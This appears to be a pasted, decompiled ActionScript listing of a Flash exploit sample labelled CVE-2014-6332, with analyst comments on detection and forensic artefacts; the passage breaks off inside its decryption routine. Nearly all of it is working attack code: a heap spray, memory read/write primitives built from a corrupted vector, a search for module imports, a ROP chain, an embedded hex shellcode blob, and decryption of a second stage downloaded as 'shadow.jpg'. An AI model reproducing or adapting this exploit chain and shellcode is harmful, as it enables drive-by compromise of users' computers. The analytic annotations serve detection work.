Nytro

Exploit.SWF.CVE-2014-6332


Exploit.SWF.CVE-2014-6332

By: physicaldrive0 on Nov 21st, 2014

*** PhysicalDrive0 ***

// Declares the mx_internal namespace. In this listing it is only used to
// qualify ByteArrayAsset.VERSION; it carries no sample-specific logic.
package mx.core {

public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
}//package mx.core
// NOTE(review): the "?" in front of "package" is a paste/encoding artefact that
// appears at each file boundary in this listing; it is not ActionScript.
// Empty marker interface implemented by ByteArrayAsset.
?package mx.core {

public interface IFlexAsset {

}
}//package mx.core
// NOTE(review): the leading "?" is a paste/encoding artefact, not ActionScript.
// Base class for embedded binary assets: a ByteArray tagged with IFlexAsset.
// The only member is a version string, which can help date the toolchain that
// produced the sample.
?package mx.core {
import flash.utils.*;

public class ByteArrayAsset extends ByteArray implements IFlexAsset {

mx_internal static const VERSION:String = "4.6.0.23201";

}
}//package mx.core
// NOTE(review): the leading "?" is a paste/encoding artefact, not ActionScript.
// Embedded binary asset referenced through flappyMan.keyClass. func_step2
// instantiates it, copies its first 0x0100 bytes into a separate array that is
// handed to encryption() as the key argument, and then reads an int at
// position 0x0100 that becomes the read offset into the downloaded
// "shadow.jpg" data. The asset's bytes are not part of this listing, so the
// second stage cannot be decoded from this page alone.
?package {
import mx.core.*;

public class flappyMan_keyClass extends ByteArrayAsset {

}
}//package
?package {
import flash.events.*;
import flash.utils.*;
import flash.display.*;
import flash.media.*;
import __AS3__.vec.*;
import flash.net.*;
import flash.external.*;

public class flappyMan extends MovieClip {

// Instance state of the sample. Names are as recovered by the decompiler.
// NOTE(review): several fields (btaObj, outObj, bGoNextStep, infectedObjIndex,
// iLoopCount, offset, iCountOffset, flagNumber, flagSavePosition, code,
// stopCode, floatString) are assigned at most once and never read in the
// methods visible here; treat them as leftovers unless another build uses them.
public var keyClass:Class;
private var btaObj:ByteArray;
private var outObj:theoutobj;
private var sndObj:Sound;
// Two pools of Vector objects filled in func_prepare.
public var vtObj20W:Vector.<Object>;
public var vtObj1H:Vector.<Object>;
// Element counts used for every vector in the two pools. func_step2 and
// checkProperty compare observed lengths against vtObj20WLen.
public var vtObj20WLen:int = 1022;
public var vtObj1HLen:int = 1007;
private var workTimerExploit:Timer;
private var bGoNextStep:Boolean = false;
// Set once func_step2 sees a pool vector whose length exceeds vtObj20WLen.
private var bExploited:Boolean = false;
private var infectedObjIndex:int = 0;
// Index into vtObj20W of the vector whose length field changed.
private var changedPropertyObjIndex:int = 0;
private var iLoopCount:int = 0;
// Base address that read4bytes/writeUnsignedInt subtract from their argument.
private var controlledAddr:uint = 0;
// Hard-coded address the code assumes its allocations will cover. A fixed
// constant like this, together with the allocation counts below, is a useful
// static signature for this family of samples.
private var heapSprayObjAddr:uint = 0x1E140000;
private var fakeEnvcoreObjAddr:uint;
private var offset:int = 0;
private var iCountOffset:int = 184;
private var stackMemoryStructAddr:int = 0;
// 3735928545 == 0xDEADBEE1
private var flagNumber:uint = 3735928545;
private var flagSavePosition:int = 176;
private var ropChainLen:int = 0;
private var uiNopValue:uint = 0;
// Value saved by func_step2 and written back by safe_exit.
private var recObjAddr:uint = 0;
private var _MaxCountPos:uint = 0;
// Number of Vector.<uint> objects allocated into vtObj20W.
private var heapSprayLenByEnv20W:int = 98688;
private var storedObjIndex:int = 0;
public var fModuleAddrStart:int = 0;
public var fModuleAddrEnd:int = 0;
private var code:String = "";
private var stopCode:String = "";
// Receives the encrypted second stage taken from the downloaded file.
private var jpgBytes:ByteArray;
private var jpgLoader:URLLoader;
private var floatString:String = "";

// Constructor: initialises state, creates the polling timer and starts a
// binary download of "shadow.jpg". Nothing else runs until that download
// completes and func_prepare is invoked.
//
// Analyst notes:
//  - The URL is relative; no host name appears in this listing.
//  - The file is requested with URLLoaderDataFormat.BINARY and later passed
//    through encryption(), so despite the extension it is handled as an opaque
//    blob rather than as an image. An SWF fetching a ".jpg" as raw bytes right
//    after load is a reasonable network/proxy hunting pivot.
public function flappyMan(){
this.keyClass = flappyMan_keyClass;
this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100);
this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32);
this.btaObj = new ByteArray();
this.outObj = new theoutobj();
this.sndObj = new Sound();
this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W);
this.vtObj1H = new Vector.<Object>(256);
// Timer fires every 250 ms, at most 34 times, i.e. polling stops after ~8.5 s.
var _local1:Number = 500;
var _local2:int = (17 * 2);
this.workTimerExploit = new Timer((_local1 / 2), _local2);
super();
var _local3:* = new URLRequest();
this.jpgBytes = new ByteArray();
this.jpgLoader = new URLLoader();
_local3.url = "shadow.jpg";
this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY;
this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare);
this.jpgLoader.load(_local3);
}
// Calls a function named "Beginx" in the hosting page through
// ExternalInterface. The _arg1 parameter is ignored.
//
// NOTE(review): nothing in this listing corrupts memory by itself; func_step2
// only polls for a Vector whose length has grown. Presumably the page-side
// "Beginx" routine supplies the trigger, which would be consistent with the
// page title's CVE-2014-6332 (a Windows OLE Automation bug reached from
// browser script, addressed by MS14-064) - confirm against the hosting HTML,
// which is not shown here. For detection, the SWF and the page script should
// be treated as one unit: the SWF alone may look inert in a sandbox.
private function evalCode(_arg1:uint):void{
if (ExternalInterface.available){
ExternalInterface.call("Beginx", "");
};
}
// Environment gate that always returns true in this build, so func_prepare
// never bails out because of it.
// NOTE(review): looks like a stub where version/OS checks were removed or never
// added - other builds may differ.
private function checkEvnExploitable():Boolean{
return (true);
}
// Run-once-per-day guard. Opens the local shared object "flashplayerinUSA" and
// returns true when it holds a timestamp less than 24 hours old; func_prepare
// aborts in that case. Returns false when the object is empty or the timestamp
// is older than 24 hours.
//
// Forensic note: Flash local shared objects persist on disk as .sol files, so
// the name "flashplayerinUSA" is a host artefact worth searching for when
// scoping which machines loaded this sample.
private function checksharobject():Boolean{
var _local2:Number;
var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
if (_local1.size == 0){
_local1.close();
return (false);
};
// Milliseconds elapsed since the stored timestamp.
_local2 = (new Date().time - _local1.data.now);
// 1 day expressed in milliseconds.
if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){
_local1.close();
return (true);
};
_local1.close();
return (false);
}
// Records the current time in the "flashplayerinUSA" local shared object, but
// only when that object is still empty. Returns true if a timestamp was
// written, false otherwise.
//
// Because an existing timestamp is never refreshed, the marker reflects the
// first time func_step2 reached this call on the host, not the most recent one.
// Note that the object is not closed on the non-empty path.
private function setsharobject():Boolean{
var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
if (_local1.size == 0){
_local1.data.now = new Date().time;
_local1.flush();
_local1.close();
return (true);
};
return (false);
}
// COMPLETE handler for the "shadow.jpg" download. Unless the daily guard says
// the sample already ran, it fills two large pools of Vector objects, calls
// into the hosting page via evalCode, and starts the timer that drives
// func_step2.
//
// Detection notes: the allocation pattern is distinctive - 98688 Vector.<uint>
// objects of 1022 elements each, plus 256 Vector.<Object> of 1007 elements all
// pointing at the same Sound instance. That is several hundred megabytes of
// near-identical allocations immediately after load, which is visible both as
// a memory spike and as a static pattern in the decompiled SWF.
// _local4 is declared but never used.
public function func_prepare(_arg1:Event):void{
var _local2:int;
var _local3:int;
var _local4:int;
if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){
return;
};
_local2 = 0;
while (_local2 < this.heapSprayLenByEnv20W) {
this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen);
// Marker value stored near the end of each vector.
this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1;
_local2++;
};
_local2 = 0;
while (_local2 < 0x0100) {
this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen);
_local3 = 0;
while (_local3 < this.vtObj1HLen) {
this.vtObj1H[_local2][_local3] = this.sndObj;
_local3++;
};
_local2++;
};
// Hand control to the page script, then begin polling for its effect.
this.evalCode(0);
this.workTimerExploit.start();
this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2);
}
public function func_step2(_arg1:Event):void{
if (this.bExploited == true){
this.workTimerExploit.stop();
return;
};
var _local2:int;
while (_local2 < this.heapSprayLenByEnv20W) {
try {
if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){
this.bExploited = true;
break;
};
} catch(e:Error) {
};
_local2++;
};
if (!this.bExploited){
return;
};
this.workTimerExploit.stop();
this.changedPropertyObjIndex = _local2;
this.storedObjIndex = this.changedPropertyObjIndex;
_local2 = 0;
this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)];
if (this.uiNopValue != this.vtObj20WLen){
this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4));
_local2 = 0;
while (_local2 < this._MaxCountPos) {
this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))];
if (this.uiNopValue == this.vtObj20WLen){
break;
};
_local2++;
};
if (_local2 == this._MaxCountPos){
this.bExploited = true;
return;
};
};
this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))];
this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823;
if (this.checkProperty() == false){
return;
};
this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8);
var _local3:uint;
var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000));
_local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000);
while (_local2 < _local4) {
if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){
_local3 = _local2;
break;
};
_local2 = (_local2 + 0x1000);
};
if (!_local3){
return (this.safe_exit());
};
var _local5:int = _local3;
while (1) {
if (_local5 < 65536){
return (this.safe_exit());
};
if (this.readUnsignedInt((_local5 + 16)) < 5){
break;
};
_local5 = this.readUnsignedInt((16 + _local5));
};
var _local6:int;
var _local7:int;
while (_local6 < 100) {
if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){
_local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40)));
if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){
break;
};
};
_local6++;
};
if (_local6 == 100){
return (this.safe_exit());
};
_local7 = this.readUnsignedInt((_local7 + 28));
_local7 = (_local7 & 0xFFFFFFFC);
var _local8:uint = this.readUnsignedInt(_local7);
_local8 = (_local8 & 0xFFFF0000);
while (1) {
if ((this.readUnsignedInt(_local8) % 65536) == 23117){
break;
};
_local8 = (_local8 - 65536);
};
var _local9:uint = _local8;
_local8 = this.readUnsignedInt((_local9 + 60));
_local8 = this.readUnsignedInt(((_local9 + _local8) + 128));
_local8 = (_local9 + _local8);
var _local10:int = _local8;
var _local11:int;
var _local12:int;
_local6 = 0;
while (_local6 < 20) {
_local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12)));
if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){
_local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20))));
_local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16)));
break;
};
_local6++;
};
if (_local6 == 20){
return (this.safe_exit());
};
var _local13:uint;
var _local14:uint;
var _local15:uint;
var _local16:uint;
var _local17:int;
_local6 = 0;
while ((((_local6 < 1367)) && ((_local17 < 2)))) {
_local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4))));
if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){
break;
};
if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){
_local14 = (_local11 + (_local6 * 4));
_local13 = this.readUnsignedInt(_local14);
_local17++;
} else {
if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){
_local16 = (_local11 + (_local6 * 4));
_local15 = this.readUnsignedInt(_local16);
_local17++;
};
};
_local6++;
};
if (_local6 == 1367){
return (this.safe_exit());
};
this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60));
this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264));
this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260));
this.fModuleAddrStart = (_local9 + this.fModuleAddrStart);
this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd);
_local6 = this.fModuleAddrStart;
this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart);
this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd);
var _local18:int;
_local6 = this.fModuleAddrStart;
while (_local6 < this.fModuleAddrEnd) {
if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){
_local18 = (_local6 - 2);
break;
};
_local6++;
};
var _local19:uint;
var _local20:uint;
var _local21:uint;
var _local22:uint;
var _local23:uint;
var _local24:uint;
var _local25:uint;
var _local26:uint;
_local6 = (this.fModuleAddrStart + 0x1000);
_local17 = 0;
while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) {
_local21 = this.readUnsignedInt(_local6);
if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){
_local26 = _local6;
_local17++;
};
if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){
_local25 = _local6;
_local17++;
};
if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){
_local23 = _local6;
_local17++;
};
if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){
_local24 = _local6;
_local17++;
};
_local6++;
};
if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){
return (this.safe_exit());
};
var _local27:int = (_local25 + 1);
var _local28:int = (this.heapSprayObjAddr + 65792);
var _local29 = (_local28 & 0xFFFFF000);
var _local30:ByteArray = new ByteArray();
_local30.endian = Endian.LITTLE_ENDIAN;
_local6 = 0;
while (_local6 < 0x0100) {
var _temp1 = _local6;
_local6 = (_local6 + 1);
_local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1))));
};
var _local31:ByteArray = new ByteArray();
_local31.endian = Endian.LITTLE_ENDIAN;
_local6 = 0;
while (_local6 < 262144) {
var _temp2 = _local6;
_local6 = (_local6 + 1);
_local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2))));
};
var _local32 = 96;
var _local33 = 32;
var _local34:int;
var _local35:uint = ((_local28 + _local32) + _local33);
var _temp3 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35);
_local34 = 0;
var _temp4 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27);
var _temp5 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25);
var _temp6 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23);
var _temp7 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28);
var _temp8 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18);
var _temp9 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29);
var _temp10 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536);
var _temp11 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000);
var _temp12 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp12)), 64);
var _temp13 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6));
var _temp14 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6));
var _temp15 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6));
var _temp16 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24);
var _temp17 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24);
this.ropChainLen = (_local34 * 4);
while (_local34 < (_local32 / 4)) {
var _temp18 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32));
};
while (_local34 < ((_local32 + _local33) / 4)) {
var _temp19 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26);
};
this.ropChainLen = _local34;
var _temp20 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307);
var _temp21 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090);
var _temp22 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936);
var _temp23 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8));
var _temp24 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584);
var _temp25 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15);
var _temp26 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569);
var _temp27 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936);
var _temp28 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4)));
var _temp29 = _local34;
_local34 = (_local34 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127);
var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e8
85895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc";
var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36);
this.writeUnsignedInt(this.heapSprayObjAddr, _local37);
var _local38:ByteArray = (new this.keyClass() as ByteArray);
var _local39:ByteArray = new ByteArray();
_local38.readBytes(_local39, 0, 0x0100);
_local38.endian = Endian.LITTLE_ENDIAN;
_local38.position = 0x0100;
this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
this.jpgBytes.position = 0;
ByteArray(this.jpgLoader.data).position = _local38.readInt();
ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0);
this.jpgBytes = this.encryption(this.jpgBytes, _local39);
this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
this.jpgBytes.position = 0;
var _local40:* = this.jpgBytes.length;
var _local41:int;
var _local42:uint;
while (((_local41 + 1) * 4) < _local40) {
_local42 = this.jpgBytes.readInt();
try {
this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42);
} catch(e:Error) {
};
_local41++;
};
var _local43:uint = this.readUnsignedInt(_local7);
this.writeUnsignedInt(_local7, _local28);
this.sndObj.toString();
this.writeUnsignedInt(_local7, _local43);
_local31.position = 0;
_local6 = 0;
while (_local6 < (_local31.length / 4)) {
var _temp30 = _local6;
_local6 = (_local6 + 1);
this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt());
};
_local30.position = 0;
_local6 = 0;
while (_local6 < (_local30.length / 4)) {
var _temp31 = _local6;
_local6 = (_local6 + 1);
this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt());
};
this.setsharobject();
return (this.safe_exit());
}
// Clean-up routine called on every exit path of func_step2 after the length
// change has been confirmed. It writes the original vector length
// (vtObj20WLen) and the value saved in recObjAddr back to fixed locations.
// NOTE(review): presumably this restores the modified Vector headers so the
// player keeps running without a crash - which also means a successful run may
// leave no crash dump or error dialog for responders to find.
public function safe_exit():void{
this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen);
this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr);
this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen);
}
// Logging hook with an empty body: the argument is never used and nothing is
// sent to the page. Not called anywhere in this listing.
// NOTE(review): looks like debug output that was stripped before release.
public function logMsg(_arg1:String):void{
if (ExternalInterface.available){
};
}
// Calls the page-side function whose name is given in _arg1 through
// ExternalInterface and returns its result as a uint (0 when
// ExternalInterface is unavailable). Not called anywhere in this listing.
public function get_address(_arg1:String):uint{
var _local2:uint;
if (ExternalInterface.available){
_local2 = ExternalInterface.call(_arg1, "");
};
return (_local2);
}
// If the tracked vector reports a length of at least 1073741823 (0x3FFFFFFF),
// writes the original length vtObj20WLen through it at index 0x40000000 - 2.
// Not called anywhere in this listing.
// NOTE(review): appears to be an alternative restore path to safe_exit.
public function exception_exit():void{
if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){
this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen;
};
}
// Returns one 32-bit element of the tracked Vector.<uint>, selected by turning
// the address argument into an element index relative to controlledAddr.
// Addresses at or below controlledAddr are mapped to indices counted back
// from 0x40000000.
//
// This only works because the vector's length was changed from outside
// ActionScript; with an intact length every such index would raise a
// RangeError. Later Flash Player releases added integrity checks on Vector
// lengths specifically to break this pattern.
private function read4bytes(_arg1:uint):uint{
var _local2:uint;
if (_arg1 > this.controlledAddr){
_local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)];
} else {
_local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))];
};
return (_local2);
}
// Reads a 32-bit value at an address that need not be 4-byte aligned.
// Aligned addresses go straight to read4bytes; otherwise the two neighbouring
// aligned words are read and the result is assembled from the high part of the
// lower word and the low part of the upper word.
private function readUnsignedInt(_arg1:uint):uint{
var _local2:uint;
var _local3:uint;
var _local4:uint;
if ((_arg1 % 4) == 0){
_local4 = this.read4bytes(_arg1);
} else {
if ((_arg1 % 4) == 1){
// Offset 1: upper three bytes of the lower word + lowest byte of the next word.
_local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF);
_local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000);
_local4 = (_local2 + _local3);
} else {
if ((_arg1 % 4) == 2){
// Offset 2: upper half of the lower word + lower half of the next word.
_local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF);
_local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000);
_local4 = (_local2 + _local3);
} else {
// Offset 3: top byte of the lower word + lower three bytes of the next word.
_local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF);
_local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00);
_local4 = (_local2 + _local3);
};
};
};
return (_local4);
}
// Write counterpart of read4bytes: stores _arg2 into the tracked Vector.<uint>
// at the element index derived from address _arg1 relative to controlledAddr.
// Unlike readUnsignedInt there is no handling for unaligned addresses; the
// index computation simply divides the byte offset by 4.
private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{
if (_arg1 > this.controlledAddr){
this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2;
} else {
this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2;
};
}
// Thin wrapper around rc4_crypt. _arg1 is the data, _arg2 the key material;
// note that the argument order is swapped when forwarding. Returns a new
// ByteArray of the same length as _arg1. The ByteArray created for _local3 is
// discarded immediately when the rc4_crypt result is assigned.
// In func_step2 this is applied to the bytes taken from "shadow.jpg", so the
// name notwithstanding it serves as the decoding step for the second stage.
public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{
var _local3:ByteArray = new ByteArray();
var _local4:uint = _arg1.length;
